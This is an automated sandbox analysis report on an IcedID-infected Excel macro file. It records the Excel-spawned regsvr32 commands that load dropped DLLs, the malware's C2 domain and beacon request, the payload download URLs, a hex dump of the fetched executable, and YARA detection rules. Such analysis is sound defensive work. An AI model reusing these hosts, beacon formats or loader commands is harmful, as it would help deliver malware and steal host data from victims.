Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report LL52387-01M4205301.xlsm

Overview

General Information

Sample Name:LL52387-01M4205301.xlsm
Analysis ID:444806
MD5:f45c798d44794fc75c16d6aac22b1e83
SHA1:6519f4988344c90ac3680dd910dc739f5ce7c442
SHA256:f5472b197dc1ffb19095d59d99696cf47c41b334a8d25b32b431a80bbf1bbd00
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2388 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2384 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2380 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2196 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000004.00000002.2104111082.0000000000190000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      Process Memory Space: regsvr32.exe PID: 2380JoeSecurity_IcedID_1Yara detected IcedIDJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.regsvr32.exe.190000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        4.2.regsvr32.exe.190000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        4.2.regsvr32.exe.1b0000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2388, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2384

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 4.2.regsvr32.exe.190000.0.raw.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
        Source: global trafficDNS query: name: thousandsyears.download
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: astrocycle.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 15:49:53 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 6801Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BDNChGJ59YNjBFqZa4TKC4pQsxnL7NdGF%2B60x6I5VvFXRTOmismddTlrNVyVond1jowHhLHRmejjuZTFiFP3ft4aoDN5DaqrJgjCHBHKwv4qBt4fxYB8wmsYcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9fc531afd2c22-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5640:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=373135353735:416C627573:38443943323244313446374646354435; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: Joe Sandbox ViewIP Address: 172.67.198.51 172.67.198.51
        Source: Joe Sandbox ViewIP Address: 13.224.92.73 13.224.92.73
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24A691BB.pngJump to behavior
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5640:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=373135353735:416C627573:38443943323244313446374646354435; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0. equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0. equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
        Source: regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-IdeaQqc8iBLxpWxiD2WtTR8e1VwSVwXFlnjVHZWquCo3TDJPScneKUqQ==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net 